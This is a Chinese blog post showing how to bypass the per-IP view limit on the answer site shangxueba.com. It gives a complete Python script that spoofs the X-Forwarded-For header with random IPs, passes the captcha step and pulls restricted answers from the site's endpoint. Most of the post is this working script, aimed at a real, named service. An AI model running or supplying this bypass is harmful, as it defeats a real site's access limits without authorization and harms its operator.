上学吧,这个网站是蛮好的,但是就是有次数限制,使用次数多了就变成下面那张1图片一样了。
我就想能不能使用python突破这个限制,由于没有实现登入限制,只是看的次数的显著。所以猜测是ip限制,就换了一个ip,发现就可以了
但是我并不想使用代理,那我就想能不能去欺骗网站。看了一下网站是用什么搭建的,一看原来是asp网站,就想到了前段时间玩ctf的时候,欺骗asp网站的经历了,所以尝试了一下,发现果然成功了,通过构造X-Forwarded-For这个headers
效果
代码
import requests
import random
import os
from PIL import Image
from config import *
import urllib3
urllib3.disable_warnings()
def get_Verifynum(url):
global session
r= session.get("https://www.shangxueba.com/ask/VerifyCode2.aspx",verify=False)
with open('temp.jpg','wb+') as f:
f.write(r.content)
image=Image.open('temp.jpg')
image.show()
Verifynum=input("输入验证码:")
image.close()
os.remove("temp.jpg")
return Verifynum
def verifyfirst(Verifynum):
global session
data={
"Verify": Verifynum,
"action": "CheckVerify",
}
session.post("https://www.shangxueba.com/ask/ajax/GetZuiJia.aspx",data=data)
def get_ans_html(Verifynum,dataid):
global session
data={
"phone":"",
"dataid": dataid,
"action": "submitVerify",
"siteid": "1001",
"Verify": Verifynum,
}
r=session.post("https://www.shangxueba.com/ask/ajax/GetZuiJia.aspx",data=data)
return r.text
def write(html_data):
html="""
<html>
<head>
</head>
<body>
<hr>
<div style="width:600px;margin:0 auto">
%s
</div>
</body>
</html>
"""%(html_data)
with open("ans.html","w+",encoding="utf-8") as f:
f.write(html)
if __name__ == '__main__':
global session
while True:
session = requests.session()
session.headers.update({"X-Forwarded-For":"%d.%d.%d.%d"%(random.randint(120,125),random.randint(1,200),random.randint(1,200),random.randint(1,200))})
url = input("请输入上学吧题目所对应的网址\n如:https://www.shangxueba.com/ask/8952241.html\n输入exit结束本程序:")
url = url.strip()
if "exit"in url :
break
if "html" not in url or "https" not in url:
print("url 格式不对")
continue
dataid=url.split("/")[-1].replace(r".html","")
verifynum = get_Verifynum(url)
verifyfirst(verifynum)
html=get_ans_html(verifynum,dataid)
write(html)
print("===========================================\n\n\n\n\n答案在该程序同一个目录生成的的ans.html中\n\n\n\n\n\n\n\n===========================================")